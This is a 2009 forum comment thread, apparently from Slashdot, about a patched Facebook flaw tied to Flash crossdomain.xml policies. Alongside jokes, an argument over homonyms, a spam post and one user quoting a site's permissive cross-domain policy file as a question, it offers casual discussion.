13. Re:Damnit, people, can you see the problem here? by Anonymous Coward · 2009-11-05 09:31 · Score: 0
  
  Get off the internet. It's clearly having an adverse effect on your sense of humor.
  Or is that just how you are natchurallee?
14. Re:Damnit, people, can you see the problem here? by Anonymous Coward · 2009-11-06 03:20 · Score: 0
  
  while the words "Shirley" and "surely" are homonyms, the spelling is clearly different
  Thus, they are homophones, not homonyms.
15. Re:Damnit, people, can you see the problem here? by Tetsujin · 2009-11-06 05:12 · Score: 1
  
  while the words "Shirley" and "surely" are homonyms, the spelling is clearly different
  Thus, they are homophones, not homonyms.
  Aw, damn it, you're right... I am embarrassed to have gotten that wrong. That pretty much ruins the "Add homonym attack" joke, too...
  
  --
  Bow-ties are cool.
16. Re:Damnit, people, can you see the problem here? by Anonymous Coward · 2009-11-08 14:13 · Score: 0
  
  A homophone is a type of homonym, as is a homograph.
Facebook Spam by pipingguy · 2009-11-05 06:38 · Score: 1

Yeah, I'm a lamer, I have a FaceBook account.

Am I the only one who's been getting a shitload of FaceBook spam recently?
Thank god by OricAtmos48K · 2009-11-05 07:51 · Score: 1

I am happy to hear that the patch is out in action otherwise WOULD YOU LIKE TO ENLARGE YOUR P**IS ?
have I understood correctly? by dropadrop · 2009-11-05 08:29 · Score: 1

So did I get this correctly...
I have a crossdomain.xml file on my website a.com with a very lax policy (allow *). This means that pretty much any flash file I open from any other site can access a.com and see (or copy) data with my permissions? If I have auto-login enabled (as in the facebook example) it can log in with my cookies and collect the data without the site being open, and if my site does not feature auto login it can still access the data given I have an open session?
Facebook Chat by Anonymous Coward · 2009-11-05 09:37 · Score: 0

Has anyone here notice a bug that allows you to see online friends on your iphone that aren't online on the computer? This bug persists with the same friends even after reboot of the ipod and computer.
Other sites by Anonymous Coward · 2009-11-05 10:49 · Score: 0

I'm not sure I totally understand the technical issues, but is Xanga doing this wrong? http://www.xanga.com/crossdomain.xml
cross-domain-policy>
allow-http-request-headers-from domain="*" headers="*"/>
allow-access-from domain="*" to-ports="80"/> /cross-domain-policy>
Add-Homonym attack! by Tetsujin · 2009-11-05 11:37 · Score: 1

Meh. No offense, but I didn't think your "Shirley" joke was funny in the first place. It works just fine in written form because everyone knows it already and it got its humour from the original, not the written version.
No offense taken. Anybody who's gonna take a crack at being funny has to be willing to accept that sometimes it doesn't work out. :) I'm only funny sometimes - I can live with that.
Personally I don't think homonym-based jokes work at all well in text... By their nature they rely on ambiguity that doesn't exist in text. Sometimes it's a real drag, 'cause I like those kinds of jokes.

--
Bow-ties are cool.
1. Re:Add-Homonym attack! by clone53421 · 2009-11-06 01:30 · Score: 1
  
  Anybody who's gonna take a crack at being funny has to be willing to accept that sometimes it doesn't work out.
  As someone who has both gotten funny mods on posts that weren't intended to be funny, and gotten Anonymous Coward posts up-modded to +5 Funny when I thought they'd be a little too trollish/flamebaitish to risk posting as myself (that sucks, btw), I must say I understand and agree.
  
  --
  Alexander Peter Kristopeit bought his basement from his mommy for one dollar.
2. Re:Add-Homonym attack! by longhairedgnome · 2009-11-06 05:52 · Score: 0
  
  Dude, people still think the joke is funny, even if it is written out. You're just an asshole.
  
  --
  GENERATION O98346: The first time you see this, copy it into your sig and remove a random number from the generation. T
Well? by commodoresloat · 2009-11-05 15:06 · Score: 1

Get to the point, man. What kind of left-handed vampire are they?
1. Re:Well? by longhairedgnome · 2009-11-06 06:08 · Score: 0
  
  They are gay left-hand vampires! D3y @!! 5uck!
  Also GGP really loves self censoring himself.
  
  --
  GENERATION O98346: The first time you see this, copy it into your sig and remove a random number from the generation. T
Premium White Pro by ronnny · 2009-11-05 18:00 · Score: 1

Facebook is no comparison to myspace . Myspace is different zone of siti Premium White Pro
Re: Ogre updated his status! by Anonymous Coward · 2009-11-05 18:25 · Score: 0

I'm guessing those mods are the kind of folks who are very sensitive about the how many "friends" they have on social network sites, and don't like anyone raining on their parade - consequently supporting anyone who lashes out at people who don't need the constant sense of validation that social networks bring.
NNNNNNEEEEEERRRRDDDDS!!!
Deactivation by andytgeezer · 2009-11-06 03:41 · Score: 1

There's never a wrong week to deactivate your facebook account....

--
REAL post by REAL people on a REAL wall. Forget facebook! www.myREALwall.com